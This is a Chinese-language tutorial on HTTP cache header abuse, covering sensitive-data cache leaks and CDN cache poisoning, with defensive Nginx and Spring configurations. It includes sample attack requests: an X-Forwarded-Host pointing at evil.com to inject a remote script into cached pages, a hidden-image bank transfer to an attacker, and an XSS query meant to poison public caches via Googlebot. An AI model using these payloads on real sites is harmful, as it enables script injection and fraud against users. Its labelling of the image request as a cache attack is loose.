HTTP缓存头滥用：CDN的黑暗面

1. 漏洞核心原理

HTTP缓存头滥用 是一种通过操纵缓存控制头（如Cache-Control、Vary），诱导CDN或浏览器缓存敏感内容的攻击方式。当网站错误配置缓存策略时，可能导致：

• 用户隐私数据被缓存到公开URL

• 不同用户收到彼此缓存的敏感内容

• 恶意内容被长期保留在缓存中

攻击三要素：

1. 可缓存的响应头配置（如public, max-age=3600）

2. 动态内容未正确标记为private/no-store

3. CDN或浏览器未严格校验内容敏感性

2. 攻击类型与复现

(1) 敏感数据缓存泄露

GET /account/profile HTTP/1.1
Host: victim.com

HTTP/1.1 200 OK
Cache-Control: public, max-age=600  # 错误配置
Content-Type: text/html

<user_private_data>

利用方式：

• 诱导用户访问后，攻击者访问相同URL获取缓存

(2) 缓存投毒（Cache Poisoning）

GET /?param=attacker_payload HTTP/1.1
Host: victim.com
X-Forwarded-Host: evil.com

HTTP/1.1 200 OK
Cache-Control: public
Vary: X-Forwarded-Host  # 危险用法
Content-Type: text/html

<script src="https://evil.com/malicious.js">

效果：所有访问/?param=*的用户加载恶意JS

(3) 浏览器缓存攻击

<!-- 恶意页面代码 -->
<img src="https://bank.com/transfer?to=attacker&amount=1000">

特点：利用浏览器缓存自动携带认证Cookie

3. 自动化检测工具

# 安全示范 - Nginx配置
location ~* \.(php|asp|jsp)$ {
    add_header Cache-Control "no-store, no-cache";
}

location /api/ {
    proxy_cache_bypass $cookie_auth_token;
    add_header Vary "Authorization";
}

// Spring安全示范
@GetMapping("/account")
public ResponseEntity<UserData> getAccount(
    @AuthenticationPrincipal User user) {
    return ResponseEntity.ok()
        .cacheControl(CacheControl.noStore())
        .body(userService.getData(user));
}

# 检查缓存头
curl -I https://target.com/account | grep -i "cache-control\|vary"

GET /?q=<script>alert(1)</script> HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1

--> 诱导Googlebot爬取以污染公共缓存